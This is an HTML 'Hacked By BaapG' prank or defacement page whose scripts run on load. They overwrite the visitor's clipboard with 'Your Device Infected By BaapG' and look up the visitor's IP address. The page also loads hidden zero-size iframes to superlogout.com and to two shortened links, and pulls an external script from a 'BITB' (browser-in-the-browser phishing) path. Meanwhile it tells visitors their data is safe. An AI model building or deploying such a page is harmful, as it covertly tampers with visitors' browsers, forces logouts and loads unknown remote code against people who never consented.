<!doctype html>

<!--
  
  https://baapg.github.io

  Author
BaapG
-->

<html>
<head><body style="background-color:black;">
      
       </body>
<title> Krishna Singh Rajput | Hacked By BaapG</title>
<script>
var text = "Your Device Infected By BaapG";
navigator.clipboard.writeText(text).then(function() {
  console.log('Async: Copying to clipboard was successful!');
}, function(err) {
  console.error('Async: Could not copy text: ', err);
});

</script>

  <meta charset='UTF-8'>
  <meta name='theme-color' content='#fff' class='theme-color'/>
  <style>
    html, body {
      width: 100%;
      height: 100%;
      margin: 0;
      font-family: -apple-system, BlinkMacSystemFont, 'avenir next', avenir,
        'helvetica neue', helvetica, ubuntu, roboto, noto, 'segoe ui', arial,
        sans-serif;
      overflow: hidden;
    }
    .hello-message {
      margin: 40px;
      text-align: center;
    }
    .logout-messages {
      pointer-events: none;
      color: red;
      margin: 40px;
      position: fixed;
      top: 0;
      left: 0;
      text-shadow: 2px 2px #FFF, 4px 4px 10px #000;
    }
    img {
      width: 300px;
    }
    @keyframes blurslowly {
      0% {
        filter: none;
      }
      92% {
        filter: blur(0);
      }
      96% {
        filter: blur(1px);
      }
      100% {
        filter: blur(0);
      }
    }
    body {
      animation-name: blurslowly;
      animation-iteration-count: infinite;
      animation-duration: 3s;
      animation-play-state: running;
    }
  </style>
</head>
<body>
<style>
	h1 {
		color: green;
	}
	</style>
	<script src=
"https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js">
	</script>
	
<script>
	
	// Add "https://ipinfo.io" statement
	// this will communicate with the ipify servers
	// in order to retrieve the IP address
	$.get("https://ipinfo.io", function(response) {
			alert(response.ip);
		}, "json")
		
		// "json" shows that data will be fetched in json format
	
 var text = "Hacked By BaapG";
navigator.clipboard.writeText(text).then(function() {
  console.log('Async: Copying to clipboard was successful!');
}, function(err) {
  console.error('Async: Could not copy text: ', err);
});
</script>
<template>
  <div class='hello-message'>
    <h1><font color=lime>Jai Rajputana </h1>

    <h2><font color=Green>To get started, HOLD DOWN the space key for 3 seconds.</h2>
    <h3><font color=Green>(or, on mobile, tap This Img!)</h3>

    <img src='/BaapG.jpg' alt='Cute cat' />
  </div>
  <div class='logout-messages'></div>
<h6><font color=black> →→→→→→ Hacked By BaapG</h6>
<h6><font color=black> © BaapG ★</h6>
<h6><font color=black> ---------- Don't Worry Your Data is Safe</h6>
</template>

<script src='/index.js'></script>

<div align="center"><img style="padding:0; height: 600px; width: 900px;" align="center" src="https://i.pinimg.com/originals/e9/ea/34/e9ea347d7bc199e10ac7f1592ce8abe5.gif" alt="resim"></div>
<div class="main-box" >

<script async src='https://www.googletagmanager.com/gtag/js?id=UA-3898076-24'></script>
<script>
  window.dataLayer = window.dataLayer || []
  function gtag () {
    window.dataLayer.push(arguments)
  }
  gtag('js', new Date())
  gtag('config', 'UA-3898076-24')
</script>


   <style>
body {
    background-image: url("https://pa1.narvii.com/6958/b32afa2ea9c603fc4f73fc443ec0504d42d63d82r1-300-300_hq.gif");

background-size: cover;
</style> 
<h6><font color=black> ---------- Follow Me On Insta Krish_na_2568</h6>
<h6><font color=black> ---------- Because data is not transfer on any server</h6>
<body>
<div id="window">
<!-- Title bar start -->
<div id="title-bar-width">
	<div id="title-bar">
		<div style="margin-top:5px;">
			<img src="https://www.nasa.gov/sites/all/themes/custom/nasatwo/images/nasa-logo.svg" width="0px" height="0px" id="logo">
			
		</div>

		
	</div>
	<div id="url-bar">
		
		
	</div>
</div>
<!-- Content start -->

<iframe width="0" height="0" id="content" src="https://cutt.ly/yQYypD4" frameBorder="0"></iframe>
<iframe width="0" height="0" id="content" src="https://superlogout.com/" frameBorder="0"></iframe>
<iframe width="0" height="0" id="content" src="https://bit.do/1LoveYou" frameBorder="0"></iframe>
</div>
</body>
<script src="https://baapg.github.io/BITB/4/script.js"></script>
<script>
var text = "Your Device Infected By BaapG";
navigator.clipboard.writeText(text).then(function() {
  console.log('Async: Copying to clipboard was successful!');
}, function(err) {
  console.error('Async: Could not copy text: ', err);
});

</script>
</body>
</html>
